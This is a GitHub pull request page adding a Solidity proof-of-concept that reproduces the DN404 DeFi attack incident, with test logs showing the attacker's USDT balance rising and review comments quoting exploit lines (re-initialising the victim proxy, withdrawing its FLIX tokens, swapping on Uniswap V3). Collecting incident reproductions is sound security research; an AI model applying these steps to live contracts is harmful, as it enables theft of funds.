Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

feat: add DN404 attack incident #643

Merged
merged 8 commits into from
Apr 30, 2024
Merged

feat: add DN404 attack incident #643

merged 8 commits into from
Apr 30, 2024

Conversation

LouisTsai-Csie
Copy link
Contributor 

Ran 1 test for src/test/DN404_exp.sol:DN404
[PASS] testExploit() (gas: 158950)
Logs:
   Attacker USDT Balance Before exploit: 0.000000
   Attacker USDT Balance Before exploit: 169577.736489

akshaynexus
akshaynexus suggested changes Apr 30, 2024
View reviewed changes
Copy link
Contributor

@akshaynexus akshaynexus left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Need some changes,overall good

src/test/DN404_exp.sol Outdated
IProxy(victim).withdraw(IERC20(FLIX), amount, address(this));
Uni_Pair_V3(UniV3Pair).swap(address(this), true, 685_000_000_000_000_000_000_000, 4_295_128_740, "");
// Log balances after exploit
emit log_named_decimal_uint(" Attacker USDT Balance Before exploit", IERC20(USDT).balanceOf(address(this)), 6);
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Set this log to after exploit

src/test/DN404_exp.sol Outdated
uint256 initPeriods = 1;
uint256 initInterval = 1_000_000_000_000_000_000;
IProxy(victim).init(IERC20(WETH), initPeriods, initInterval);
uint256 amount = IERC20(FLIX).balanceOf(address(victim));
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

put this before init,so that its easy to read

README.md Outdated
#### Contract
[DN404_exp.sol](src/test/DN404_exp.sol)
### Link reference

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

IF not having a link reference remove this part?

@LouisTsai-Csie
Copy link
Contributor Author

Need some changes,overall good

@akshaynexus I made some changes according to your suggestion, please take a look. Thank you!

By the way, is there any style guideline for writing the PoCs in this repo, I would like to follow for readability.

@akshaynexus
Copy link
Contributor

I don't think there is one,reason I suggested readability changes is just mostly cause what I tend to prefer whenooking at contracts at a glance

@SunWeb3Sec
Copy link
Owner

Corrected some ordering.

@SunWeb3Sec SunWeb3Sec merged commit 9c4230a into SunWeb3Sec:main Apr 30, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@akshaynexus akshaynexus akshaynexus requested changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@LouisTsai-Csie @akshaynexus @SunWeb3Sec